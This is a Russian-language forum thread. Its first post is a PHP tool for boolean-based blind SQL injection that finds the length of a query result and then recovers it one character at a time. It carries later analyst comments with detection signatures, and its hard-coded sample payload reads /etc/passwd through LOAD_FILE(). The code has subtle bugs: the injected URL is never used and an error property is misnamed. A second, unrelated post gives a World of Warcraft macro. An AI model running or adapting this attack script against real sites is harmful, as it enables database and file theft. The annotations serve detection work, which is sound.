блайнд скрипт. |
Icewar93web,
Код <?php
/*
 * Boolean-based blind SQL injection client (banner: 2012, XAMEHA / Antichat.ru),
 * annotated here for analysis and detection work.
 *
 * What the listing shows:
 *  - A URL and/or POST body containing the placeholder {BoolInjVar}, which is
 *    replaced by a boolean SQL condition for every probe.
 *  - The true/false oracle is the presence of a Content-Disposition line in the
 *    HTTP response (see ToBool), so the page body does not need to change for
 *    data to leak.
 *  - Probe conditions have three fixed shapes: the baseline pair 1=1 / 1=0,
 *    length((<sql>))<=N, and ord(mid((<sql>),<pos>,1))<=N or =N.
 *  - Every request carries the same hard-coded Firefox 9.0.1 User-Agent.
 *
 * Defender notes: the condition shapes and the static User-Agent are usable as
 * log / WAF signatures, and one extracted character costs several sequential
 * requests, so a run shows up as a burst of near-identical requests differing
 * only in a number. The durable fix is a parameterised query at the injectable
 * parameter; the sample expression below uses LOAD_FILE(), which additionally
 * depends on the database account holding the FILE privilege (and on
 * secure_file_priv), so a least-privilege DB account limits the impact.
 */
set_time_limit(0);
error_reporting(E_ALL);
ini_set('display_errors','On');
/* Request-type tag used by both switch statements in the class. */
define('HeaderArray', 'HeaderArray', true);
echo "################################################## ############################## # Copyright (c) 2012 XAMEHA # # Antichat.ru # # # #Usage: php FileName.php \\ # #1. \"http://host:port/path/index2.php?Get-Parm\" \\ # #2. \"Post-Data\" \\ # #3. \"SQL\" \\ # #4. \"SQL-Return\" \\, Example: \"qwertyuiopasdfghjklzxcvbnm\" # # Or is it easier to set all the required variables in the PHP-File # ################################################## ##############################\n\n";
/*
 * Comment toggle: with the markers written as below, the hard-coded sample
 * values between them are live code and overwrite the command-line arguments
 * (a loopback URL, a POST template, the SQL expression, the candidate
 * alphabet, and a fifth value).
 * NOTE(review): the listing was collapsed onto one line by the forum; the line
 * breaks around the two markers are reconstructed - confirm against the original.
 */
///*
$argv[1] = 'http://127.0.0.1:80/index.php';
$argv[2] = 'fid=(7)and({BoolInjVar})+--+';
$argv[3] = 'LOAD_FILE(\'/etc/passwd\')';
$argv[4] = "qwertyuiopasdfghjklzxcvbnm-0123456789.:\r\n";
$argv[5] = '1';
//*/
/* A URL is mandatory; the POST template is optional and defaults to false. */
!isset($argv[1]) && exit;
!isset($argv[2]) && ($argv[2]=false);

/**
 * Recovers the string value of one SQL expression through a boolean oracle:
 * first its length, then each character by bisecting a candidate alphabet.
 */
class BlindSQL {
    /* URL template passed to the constructor. */
    private $path = '';
    /* Starts as array(128), the first length bound; StartInjecting later
       replaces it with the probe log and finally with the detected length. */
    protected $len = array(128);
    /* Recovered string, pre-filled with '*' placeholders. */
    private $RetStr = '';
    /* Baseline conditions used to check that the oracle tells true from false. */
    public $TestSQL = array( 'good' => '1=1', 'bad' => '1=0' );
    /* Request parameters; cast to an object in the constructor. */
    public $parm = array( 'post' => false );

    /**
     * Converts a response into true or false.
     *
     * @param array $ret Response split into lines; element 0 is discarded.
     * @return bool True when any remaining line begins with
     *              "content-disposition" (case-insensitive, "_" treated as "-").
     */
    private function ToBool($ret) {
        $RetVar = false;
        unset($ret[0]);
        foreach ($ret as $value)
            /* Only the first 19 characters are compared, i.e. the header name. */
            if ('content-disposition' === strtolower(str_replace('_', '-', substr($value, 0, 19)))) {
                $RetVar = true;
                break;
            }
        return $RetVar;
    }

    /**
     * Sends one probe request and reduces the response to a boolean.
     *
     * @param string $TypeRequest Request type; only 'HeaderArray' is handled.
     * @param string $InjVar      Boolean SQL condition for the {BoolInjVar} placeholder.
     * @return bool|null Result of ToBool(), or null for an unhandled type.
     *                   The script terminates via die() when cURL reports an error.
     */
    private function SendRequest($TypeRequest, $InjVar) {
        switch($TypeRequest) {
            case 'HeaderArray':
                /* Set up variables: fill the placeholder in the URL template and,
                   when a POST template was given, in the POST body. */
                $path = str_replace('{BoolInjVar}', $InjVar, $this->path);
                $post_parm = ($this->parm->post===false)?false:(str_replace('{BoolInjVar}', $InjVar, $this->parm->post));
                /* Execute the request. */
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_URL, $this->path);
                curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate');
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
                /* Static User-Agent, identical on every probe.
                   NOTE(review): the literal is reproduced with the line break it
                   has in this listing - likely a paste artifact, confirm. */
                curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; rv:9.0.1) Gecko/20100101 
Firefox/9.0.1');
                /* Include the response headers in $out; ToBool reads them. */
                curl_setopt($ch, CURLOPT_HEADER, true);
                if ($post_parm !== false) {
                    curl_setopt($ch, CURLOPT_POST, true);
                    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_parm);
                }
                //curl_setopt($ch, CURLOPT_VERBOSE, 1);//Verbose request logging
                //curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8888");//Proxy
                $out = curl_exec($ch);
                $err = (object)array( 'No' => curl_errno($ch), 'Str' => curl_error($ch) );
                curl_close($ch);
                if($err->No !== 0) die("\nError, {$err->No}: {$err->str}\n\n");
                /* Split the raw response on "\n", trim each line, and classify it. */
                return $this->ToBool(array_map( function ($str) { return trim($str, "\r\n "); }, explode("\n", $out) ));
                break;
        }
        return null;
    }

    /**
     * Runs the whole recovery: baseline check, length search, per-character search.
     *
     * @param string $type Request type; only 'HeaderArray' is handled.
     * @param string $sql  SQL expression whose string value is recovered.
     * @param string $mask Candidate characters; each recovered character is one of these.
     * @param int    $len  Overwritten before use in the 'HeaderArray' branch.
     * @return string|null "\n\nString: ...\n" for 'HeaderArray'; nothing is returned otherwise.
     */
    public function StartInjecting ($type, $sql, $mask, $len = 0) {
        $this->sql = $sql;
        switch($type) {
            case 'HeaderArray':
                /* Test that the injection behaves correctly: 1=1 must read as
                   true and 1=0 as false, otherwise the script stops. */
                $Good = $this->SendRequest(HeaderArray, $this->TestSQL['good']);
                $Bad = $this->SendRequest(HeaderArray, $this->TestSQL['bad']);
                if(!($Good===true && $Bad===false)) die("This injection does not behave correctly in a standard request!\n");
                /* Start brute-forcing the length, beginning at the last value of
                   $this->len (128 by default). */
                $len = end($this->len);
                $this->len = array();
                $module = 0;
                while(true) {
                    /* One request per iteration: "is the length <= $len+$module?" */
                    $RetBool = $this->SendRequest(HeaderArray, "length(({$this->sql}))<=".($len+$module));
                    /* Log the probed bound and its answer. */
                    $this->len[count($this->len)] = (object)array('len' => ($len+$module), 'ret' => $RetBool);
                    /* False answer: add $len to the offset and double $len;
                       true answer: halve $len. */
                    $module = ($RetBool!==true)?($module+$len):($module);
                    $len = ($RetBool!==true)?($len*2):$len/2;
                    echo '+';
                    /* The loop ends once $module+$len is no longer an int (the
                       division has yielded a float); the last probed bound is
                       then stored as the length. */
                    if(!is_int($module+$len)) {
                        echo "\nLength: ".($this->len = $this->len[count($this->len)-1]->len)."\n\n";
                        break;
                    }
                }
                unset($len, $module, $RetBool, $Good, $Bad);
                /* Start recovering the string. */
                /* Build the array: sorted byte values of the candidate characters. */
                $this->BinaryInterval = array_map( function ($chr) { return (int)ord($chr); }, str_split($mask));
                sort($this->BinaryInterval);
                /**/
                $this->RetStr = str_repeat('*', $this->len);
                /* One bisection per position; SQL positions are 1-based, hence $i+1. */
                for($i=0;$i<$this->len;++$i) $this->RetStr{$i} = chr($this->BinaryIntervalFind($i+1, $this->BinaryInterval, true));
                /* Output the string. */
                return "\n\nString: {$this->RetStr}\n";
                break;
        }
    }

    /**
     * Narrows the candidate byte values for one character position by halving.
     *
     * @param int   $NumChar     1-based character position inside the SQL result.
     * @param array $BinInterval Sorted candidate byte values.
     * @param bool  $view        When true, echoes the character once it is confirmed,
     *                           or '*' when the final equality probe is false.
     * @return int The single remaining candidate, returned even when the
     *             equality probe did not confirm it.
     */
    private function BinaryIntervalFind($NumChar, $BinInterval, $view) {
        /* Split the candidates into a lower and an upper half. */
        $BinInterval = array_chunk($BinInterval, ceil(count($BinInterval)/2));
        /* One request: is the byte <= the largest value of the lower half? */
        $BinInterval = ($this->SendRequest(HeaderArray, "ord(mid(({$this->sql}),{$NumChar},1))<=".(end($BinInterval[0]))))?$BinInterval[0]:$BinInterval[1];
        if(count($BinInterval) === 1) {
            /* A last equality probe distinguishes a real match from a byte that
               is not in the candidate alphabet. */
            $RetBool = ($this->SendRequest(HeaderArray, "ord(mid(({$this->sql}),{$NumChar},1))=".(reset($BinInterval))));
            $a = $RetBool?reset($BinInterval):false;
            if($view === true) echo $a?chr($a):'*';
            return reset($BinInterval);
        }
        return $this->BinaryIntervalFind($NumChar, $BinInterval, $view);
    }

    /**
     * Stores the request templates.
     *
     * @param string       $path URL template.
     * @param string|false $post POST body template, or false for no POST body.
     */
    function __construct($path, $post) {
        /* The property is declared as an array; later code reads it as an object. */
        $this->parm = (object)$this->parm;
        $this->path = $path;
        $this->parm->post = $post;
    }
}
/* Entry point: strip surrounding quotes/backticks from the URL argument, then
   run the recovery with the SQL expression and the candidate alphabet. */
$BindObj = new BlindSQL(trim((string)$argv[1], ' "\'`'), $argv[2]);
$BindObj->StartInjecting(HeaderArray, $argv[3], $argv[4], (int)$argv[5]);
echo "\n";
Сообщение # 2 написано 13.03.2014 в 13:30
Icewar93web
Код #show Ослепление /run if not UnitDebuff("target", "Подлый трюк") and not UnitDebuff("target", "Ошеломление") and not UnitDebuff("target", "Удар по почкам") and not UnitDebuff("target", "Парализующий удар") then RunMacroText("/cast Ослепление") end
Сообщение # 4 написано 13.03.2014 в 20:33